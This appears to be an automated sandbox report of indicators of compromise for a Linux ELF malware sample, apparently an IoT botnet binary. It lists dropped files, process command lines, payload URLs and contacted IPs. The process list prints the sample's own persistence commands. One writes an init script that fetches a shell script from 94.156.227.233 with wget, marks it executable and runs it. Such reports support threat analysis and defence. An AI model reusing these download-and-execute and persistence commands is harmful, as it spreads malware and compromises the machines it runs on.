IOC Report
sh4.nn.elf

loading gif

Files

File Path
Type
Category
Malicious
sh4.nn.elf
ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
initial sample
malicious
/etc/init.d/sh4.nn.elf
POSIX shell script, ASCII text executable
dropped
malicious
/etc/init.d/system
POSIX shell script, ASCII text executable
dropped
malicious
/etc/profile
ASCII text
dropped
malicious
/etc/rc.local
POSIX shell script, ASCII text executable
dropped
malicious
/boot/bootcmd
ASCII text
dropped
/etc/inittab
ASCII text
dropped
/etc/motd
ASCII text
dropped
/etc/systemd/system/custom.service
ASCII text
dropped
/memfd:snapd-env-generator (deleted)
ASCII text
dropped
/tmp/qemu-open.LF9svx (deleted)
data
dropped

Processes

Path
Cmdline
Malicious
/tmp/sh4.nn.elf
/tmp/sh4.nn.elf
/tmp/sh4.nn.elf
-
/bin/sh
sh -c "systemctl enable custom.service >/dev/null 2>&1"
/bin/sh
-
/usr/bin/systemctl
systemctl enable custom.service
/tmp/sh4.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/system
/tmp/sh4.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/system /etc/rcS.d/S99system
/tmp/sh4.nn.elf
-
/bin/sh
sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh4.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh4.nn.elf'\n /tmp/sh4.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh4.nn.elf'\n killall sh4.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh4.nn.elf"
/tmp/sh4.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/sh4.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/sh4.nn.elf
/tmp/sh4.nn.elf
-
/bin/sh
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
/bin/sh
-
/usr/bin/mkdir
mkdir -p /etc/rc.d
/tmp/sh4.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/sh4.nn.elf /etc/rc.d/S99sh4.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/sh4.nn.elf /etc/rc.d/S99sh4.nn.elf
/tmp/sh4.nn.elf
-
/tmp/sh4.nn.elf
-
/tmp/sh4.nn.elf
-
/tmp/sh4.nn.elf
-
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/systemd/systemd
-
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/libexec/gnome-session-binary
-
/bin/sh
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
There are 36 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://94.156.227.233/curl.sh
unknown
http://94.156.227.233/lol.sh
unknown
http://94.156.227.233/oro1vk
unknown
http://94.156.227.233/
unknown

IPs

IP
Domain
Country
Malicious
136.177.253.115
unknown
United States
173.5.14.197
unknown
United States
194.150.233.243
unknown
Ukraine
212.234.148.47
unknown
France
211.33.113.230
unknown
Korea Republic of
29.194.158.5
unknown
United States
65.237.227.59
unknown
United States
100.252.93.167
unknown
United States
48.52.4.224
unknown
United States
113.198.127.147
unknown
Korea Republic of
155.26.246.10
unknown
United States
62.211.135.191
unknown
Italy
174.42.86.145
unknown
United States
146.188.103.42
unknown
United Kingdom
169.190.116.15
unknown
United States
201.75.122.208
unknown
Brazil
161.69.210.48
unknown
United States
208.193.8.68
unknown
United States
67.253.209.186
unknown
United States
14.175.57.246
unknown
Viet Nam
60.208.36.80
unknown
China
136.45.199.195
unknown
United States
223.92.145.71
unknown
China
179.137.87.125
unknown
Brazil
34.45.225.142
unknown
United States
106.111.43.16
unknown
China
29.136.86.138
unknown
United States
220.63.147.183
unknown
Japan
92.181.179.254
unknown
France
213.193.245.162
unknown
Netherlands
146.150.51.102
unknown
United States
207.85.152.113
unknown
United States
99.175.88.217
unknown
United States
95.5.137.106
unknown
Turkey
27.74.115.166
unknown
Viet Nam
25.154.143.40
unknown
United Kingdom
175.164.168.151
unknown
China
95.102.171.247
unknown
Slovakia (SLOVAK Republic)
44.18.204.240
unknown
United States
36.202.219.225
unknown
China
150.111.252.48
unknown
United States
200.72.107.21
unknown
Chile
22.187.21.236
unknown
United States
203.219.236.81
unknown
Australia
42.104.114.80
unknown
India
183.216.166.231
unknown
China
102.11.69.63
unknown
unknown
58.118.130.196
unknown
China
58.198.40.215
unknown
China
5.47.248.138
unknown
Turkey
103.219.38.247
unknown
China
87.109.14.74
unknown
Saudi Arabia
99.130.99.24
unknown
United States
125.47.104.5
unknown
China
143.238.53.4
unknown
Australia
143.149.38.158
unknown
United States
147.70.139.247
unknown
United States
215.245.84.1
unknown
United States
145.184.234.30
unknown
Netherlands
184.166.236.56
unknown
United States
184.216.64.64
unknown
United States
213.77.164.108
unknown
Poland
58.69.247.34
unknown
Philippines
78.7.68.246
unknown
Italy
136.132.101.140
unknown
United States
151.86.239.88
unknown
Italy
131.141.78.162
unknown
Canada
122.144.121.32
unknown
Philippines
142.28.111.82
unknown
Canada
69.43.233.20
unknown
United States
3.243.200.233
unknown
United States
72.249.240.252
unknown
United States
88.18.240.62
unknown
Spain
143.236.53.244
unknown
United States
112.222.70.198
unknown
Korea Republic of
21.103.141.215
unknown
United States
68.0.183.116
unknown
United States
135.25.25.113
unknown
United States
1.200.90.243
unknown
Taiwan; Republic of China (ROC)
53.5.58.198
unknown
Germany
37.161.8.40
unknown
France
223.40.235.76
unknown
Korea Republic of
2.199.111.147
unknown
Italy
102.177.96.43
unknown
Kenya
123.67.190.45
unknown
China
171.67.12.67
unknown
United States
76.86.113.215
unknown
United States
210.60.66.201
unknown
Taiwan; Republic of China (ROC)
31.106.212.216
unknown
United Kingdom
85.166.186.24
unknown
Norway
131.126.123.3
unknown
United States
98.14.0.225
unknown
United States
210.251.189.196
unknown
Japan
15.19.103.199
unknown
United States
95.55.230.222
unknown
Russian Federation
12.34.131.123
unknown
United States
141.161.183.77
unknown
United States
128.116.190.137
unknown
Italy
118.29.175.133
unknown
China
197.83.5.124
unknown
South Africa
There are 90 hidden IPs, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
7f5cf8417000
page execute read
malicious
7f5d7e6f0000
page read and write
7ffd3ea85000
page read and write
55f97ecfc000
page read and write
55f97eae6000
page execute read
55f97ed04000
page read and write
7f5d7e461000
page read and write
7f5d78000000
page read and write
55f980d19000
page read and write
7f5cf8428000
page read and write
7f5d7ef4b000
page read and write
7f5d7eab2000
page read and write
7f5d7ee22000
page read and write
7f5d7ef53000
page read and write
7f5d7ead7000
page read and write
7f5d78021000
page read and write
55f982292000
page read and write
7ffd3eb2b000
page execute read
7f5d7ef98000
page read and write
7f5d7dc50000
page read and write
7f5cf842d000
page read and write
7f5d7e453000
page read and write
55f980d02000
page execute and read and write
There are 13 hidden memdumps, click here to show them.